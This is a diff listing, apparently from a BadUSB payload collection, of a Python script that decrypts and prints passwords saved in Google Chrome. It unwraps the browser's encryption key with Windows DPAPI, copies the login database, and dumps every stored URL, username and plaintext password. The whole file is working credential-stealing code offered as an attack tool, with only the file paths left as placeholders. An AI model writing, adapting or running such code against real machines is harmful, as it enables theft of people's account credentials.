■ ■ ■ ■ ■ ■
BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/https:/github.com/UNC0V3R3D/ChromeDecrypter
| 1 | | - | import os |
| 2 | | - | import json |
| 3 | | - | import base64 |
| 4 | | - | import sqlite3 |
| 5 | | - | import win32crypt |
| 6 | | - | from Crypto.Cipher import AES |
| 7 | | - | import shutil |
| 8 | | - | from datetime import timezone, datetime, timedelta |
| 9 | | - | |
| 10 | | - | def get_chrome_datetime(chromedate): |
| 11 | | - | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) |
| 12 | | - | |
| 13 | | - | def get_encryption_key(): |
| 14 | | - | local_state_path = "path to key" |
| 15 | | - | with open(local_state_path, "r", encoding="utf-8") as f: |
| 16 | | - | local_state = f.read() |
| 17 | | - | local_state = json.loads(local_state) |
| 18 | | - | |
| 19 | | - | key_b64 = local_state["os_crypt"]["encrypted_key"] |
| 20 | | - | key = base64.b64decode(key_b64)[5:] # remove 'DPAPI' prefix |
| 21 | | - | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] |
| 22 | | - | |
| 23 | | - | def decrypt_password(password, key): |
| 24 | | - | try: |
| 25 | | - | # extract initialization vector (IV) and encrypted password |
| 26 | | - | iv = password[3:15] |
| 27 | | - | encrypted_password = password[15:] |
| 28 | | - | |
| 29 | | - | # create a cipher object using the key and IV |
| 30 | | - | cipher = AES.new(key, AES.MODE_GCM, iv) |
| 31 | | - | |
| 32 | | - | # decrypt the password |
| 33 | | - | return cipher.decrypt(encrypted_password)[:-16].decode() |
| 34 | | - | except Exception: |
| 35 | | - | # fallback to Windows Data Protection API (DPAPI) |
| 36 | | - | try: |
| 37 | | - | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) |
| 38 | | - | except Exception: |
| 39 | | - | return "" |
| 40 | | - | |
| 41 | | - | def main(): |
| 42 | | - | # get the encryption key |
| 43 | | - | key = get_encryption_key() |
| 44 | | - | |
| 45 | | - | # get the path to the Chrome login database |
| 46 | | - | db_path = "path to encrypted file" |
| 47 | | - | |
| 48 | | - | # create a copy of the login database |
| 49 | | - | filename = "ChromeData.db" |
| 50 | | - | shutil.copyfile(db_path, filename) |
| 51 | | - | |
| 52 | | - | # connect to the copy of the database |
| 53 | | - | db = sqlite3.connect(filename) |
| 54 | | - | cursor = db.cursor() |
| 55 | | - | |
| 56 | | - | # get the login data |
| 57 | | - | cursor.execute("SELECT origin_url, action_url, username_value, password_value, date_created, date_last_used FROM logins ORDER BY date_created") |
| 58 | | - | for row in cursor.fetchall(): |
| 59 | | - | origin_url = row[0] |
| 60 | | - | action_url = row[1] |
| 61 | | - | username = row[2] |
| 62 | | - | password = decrypt_password(row[3], key) |
| 63 | | - | date_created = row[4] |
| 64 | | - | date_last_used = row[5] |
| 65 | | - | |
| 66 | | - | if username or password: |
| 67 | | - | print(f"Origin URL: {origin_url}") |
| 68 | | - | print(f"Action URL: {action_url}") |
| 69 | | - | print(f"Username: {username}") |
| 70 | | - | print(f"Password: {password}") |
| 71 | | - | else: |
| 72 | | - | continue |
| 73 | | - | if date_created != 86400000000 and date_created: |
| 74 | | - | print(f"Creation date: {str(get_chrome_datetime(date_created))}") |
| 75 | | - | if date_last_used != 86400000000 and date_last_used: |
| 76 | | - | print(f"Last Used: {str(get_chrome_datetime(date_last_used))}") |
| 77 | | - | print("="*50) |
| 78 | | - | cursor.close() |
| 79 | | - | db.close() |
| 80 | | - | try: |
| 81 | | - | os.remove(filename) |
| 82 | | - | except Exception: |
| 83 | | - | pass |
| 84 | | - | |
| 85 | | - | if __name__ == "__main__": |
| 86 | | - | main() |
| 87 | | - | |
